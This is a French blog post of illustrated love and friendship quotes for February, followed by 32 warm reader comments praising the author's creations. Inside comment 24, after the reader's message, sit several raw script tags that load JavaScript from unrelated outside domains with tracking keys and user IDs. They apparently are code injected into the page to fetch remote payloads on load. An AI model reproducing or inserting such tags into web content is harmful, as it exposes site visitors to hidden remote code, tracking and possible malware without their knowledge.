• Citations pour Vous ♥

     

     

    Citations pour Vous ♥

     

     

    En matière de citations.... A l'approche du mois de Février, quoi de mieux que d'évoquer l'Amour....

     

     

    Citations pour Vous ♥

     

     

    La première m'avait été demandée par Hélène (Chipounette) avant la fin de l'année....

    Vous la retrouverez avec d'autres dans la Rubrique "Citations"-"Vie" ICI

     

     

    Citations pour Vous ♥

     

     

     

     

     

    Les Suivantes sont à Retrouver dans la Rubrique "Citations"-"Amour,Amitié" ICI

     

     

    Citations pour Vous ♥

     

     

     

     

     

    Citations pour Vous ♥

     

     

     

     

     

    Citations pour Vous ♥

     

     

     

     

     

    Citations pour Vous ♥

     

     

     

     

     

    Citations pour Vous ♥

     

     

     

     

     

    Citations pour Vous ♥

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    32
    Jacline-H-49
    Vendredi 29 Janvier 2021 à 17:09

    Bonjour ma Valie,

    Des illustrations qui s'adaptent bien aux citations, comme tu sais si bien les imaginer. Tes copinettes doivent être satisfaites de voir comment elles sont transformées. Félicitations.

    17 heures ce vendredi, et j'émerge seulement ! 

    Bonne fin de journée et tous mes 

    GROS BISOUS TENDRESSE.

    Jacline

     

    31
    Jeudi 28 Janvier 2021 à 07:24

    de belles citations joliment illustrées. bisous liliane

    30
    Mercredi 27 Janvier 2021 à 17:56

    Coucou ma belle Valie, j'espère que tu vas bien et que ta fille peut faire son stage. Passe une douce soirée, bisou rose tendresse 1

    29
    Mercredi 27 Janvier 2021 à 14:20

    Bonjour ma douce Valie

    Je me suis servie de tes belles citations et je te remercie pour ce partage

    Je te souhaite une bonne et agréable après-midi

    gros bisous pour toi et ta fille

    ton amie Janine

    28
    Mercredi 27 Janvier 2021 à 12:31

    Toujours de bien jolies créations ! Gros bisous

    27
    Mercredi 27 Janvier 2021 à 08:05

    Merci ma tite Valie pour ces belles créations!

    Bisous et belle journée

    26
    Mercredi 27 Janvier 2021 à 07:50

    C'est toujours un merveilleux moment que de découvrir tes réas qui font rêver ou sourire et en musique c'est encore mieux !! Merci Valie et bravo !

    Bonne journée !

    Bisous bisous !

    25
    Mardi 26 Janvier 2021 à 20:54

    Bonsoir Valie

    J'aime bien tes créations et tes petits mots pour la Saint-Valentin

    J'espère que tout va bien pour toi et ta fille

    bonne soirée et gros bisous

    Ton amie Janine

    24
    mamijojo77100
    Mardi 26 Janvier 2021 à 20:24

    de biens jolies mise en scene.. j aime les deux petits vieux..  ce doit etre nous deux..  gbisous  JOELLE

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1611688999149" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    23
    Mardi 26 Janvier 2021 à 18:39

    Bonsoir Ma petite Valie

    Belle page de diverses citations que j'affectionne!! 

    Douce soirée à toi et gros bisous

     

    22
    Mardi 26 Janvier 2021 à 18:13

    Très jolies mises en scènes comme à ton habitude ma tite Valie, Bravo !!!

    Agréable soirée, Doux Bisous.

    21
    Mardi 26 Janvier 2021 à 17:40

    Citations pour Vous ♥ et merci pour ces jolies citations particulièrement des grands-parents.  Douce journée à toi.

    20
    Mardi 26 Janvier 2021 à 17:33

    J'aime beaucoup ces citations tu as su les mettre magnifiquement en valeur bravo

    Bisous Pierrette67

    as-tu reçu mon courrier? ça fait plus d'une semaine qu'il est en route

    19
    Mardi 26 Janvier 2021 à 16:40

    Elles sont tellement vraies ces citations et tu les enjolives si bien. Passe une belle fin de journée, bisou rose tendresse !

    18
    Gaelle
    Mardi 26 Janvier 2021 à 14:21
    De quoi sattendrir et reflchir.
    Biz et merci
    Gaelle
    17
    Mardi 26 Janvier 2021 à 12:46
    lamanuelle25

    Superbes interprétations de ces belles citations! Bises Nadine

    16
    Mardi 26 Janvier 2021 à 12:16

    Très belles tes citations pour la St valentin bientôt!! Bravo pour tes créas......

    Bisous et douce journée

    15
    Mardi 26 Janvier 2021 à 11:43

    Ah ah, lis tu Gilles Legardinier ? Dans le dernier ouvrage de lui que je viens de lire, il passe un message sur les citations ... trop drôles ... mais en total désaccord avec toi et moi !!
    Merci encore pour celle de la rubrique du dimanche ! Et bravo pour les autres elles sont fort jolies !

    Gros Bisous

    14
    marianne pirotte
    Mardi 26 Janvier 2021 à 10:49

    Trop belles tes citations, merci ma belle !!

    Gros bisous

    Marianne

    13
    Jeannine (cristal24)
    Mardi 26 Janvier 2021 à 10:24

    Coucou Valie,

    J'espère que tu n'as pas trop froid dans ton mobil home.

    Bravo pour tes belles illustrations des citations.

    Je te souhaite une bonne semaine.

    Bises.

    Jeannine

    12
    Jour de mai
    Mardi 26 Janvier 2021 à 09:47

    Coucou Valie, 

    Encore et toujours une belle illustration des citations. Elles sont magnifiques, différentes dans leur genre mais il faut de tout pour faire un monde.

    Bravo à toi ! 

    Je pense que ce temps doit t'inciter à la création. 

    Belle journée et de très gros bisous ♥♥♥♥

    LN

    11
    Mardi 26 Janvier 2021 à 09:36

    J'aime beaucoup ta rubrique des citations. Passe une bonne journée. Bisous

    10
    Mardi 26 Janvier 2021 à 09:29
    dane

    coucou ma jolie tes citations sont très jolies il y en deux que j' aime beaucoup ,celle sur le cadre rouge et celle en dessous j' adore , c' est exactement ce que je vis avec mon homme!! si tu le permet j' aimerais te les enregistrer pour mon blog je mettrais un lien vers ton blog le jour J tu me rediras par mail gros bisous a bientôt  

    9
    JO
    Mardi 26 Janvier 2021 à 09:27

    Coucou ma Valie ♥

    De jolies citations avec des images comme tu sais si bien réaliser et que j'adore ♥♥♥♥

    Bonne journée, chez moi très ensoleillée!!!

    BISOUS DOUX ma douce

    JO06

    8
    Mardi 26 Janvier 2021 à 09:04

    Bonjour Valie 

    J'adore tes petites créas ! souvent très drôles et tendres . merci pour ce joli moment . une belle journée commence  le ciel est bleu et il y a un beau soleil ! hier apprès midi  vers 17 h une tempête de neige ! cela a duré a peu pres 45 minutes j'étais sur la route  j'ai cru que je n'allais pas pourvoir rentrer chez moi . et ce matin ciel bleu et soleil .Mais il fait froid les voitures sont recouvertes de givre blanc . Belle et douce journée Valie  gros bisous . 

     

     

     

     

     

     

     

     

     

    7
    Mardi 26 Janvier 2021 à 08:59

    de très belles citations ! bravo pour tes créas ! 

    bisous

    6
    Mardi 26 Janvier 2021 à 08:53

    Hello Valie 

    De très belles citations mises en valeur par des compétences , j'adore ! 

    j'aime beaucoup celle avec le vélo !!! des trucs bizarres ..; c'est bien pour moi ! lol

     passe une bonne journée 

    bisous

    5
    Mardi 26 Janvier 2021 à 08:38

    j'aime beaucoup celle qui représente les personnes âgées !

    belle journée ; bisous / Nicole

    4
    Mardi 26 Janvier 2021 à 08:38

      merci  beaucoup  pour  ces  belles  mises  en  scène 

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    3
    Mardi 26 Janvier 2021 à 08:34

    Toujours extra ce petit rendez-vous ! (et non, toujours rien à l'horizon, ta lettre à choisi de prendre la poudre d'escampette ! ) 

    Bises

    Thaly

    2
    Mardi 26 Janvier 2021 à 07:53

    Bonjour ma Valie, les citations mis en images sont exta, j'adore  tes créations !!!

    Bonne journée

    Bisous de Pat

    1
    Qinoa
    Mardi 26 Janvier 2021 à 07:40
    Très belles réalisations
    Bravo
    Bzz
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :